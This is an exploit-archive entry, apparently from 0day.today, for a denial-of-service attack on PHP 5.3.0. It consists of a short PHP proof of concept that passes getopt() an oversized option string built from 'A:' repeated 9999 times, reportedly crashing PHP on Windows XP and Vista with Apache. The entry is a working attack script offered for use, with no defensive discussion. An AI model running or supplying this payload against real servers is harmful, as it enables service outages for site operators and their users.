id: 11733
date: 04/12/2010
title: PHP 5.3.0 getopt() Denial of Service
author: Iman Halavati
cves: 

====================================
PHP 5.3.0 getopt() Denial of Service
====================================

<?php
#####################################################################
## PHP 5.3.0 getopt() Denial of service
## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0
## Denial of service
## Author: Napst3r
## Greets To: My Laptop &  all My Friends
#####################################################################
 
$buffer  = str_repeat('A:', 9999);
$options = getopt($buffer);
 
?>



#  0day.today [2023-03-22]  #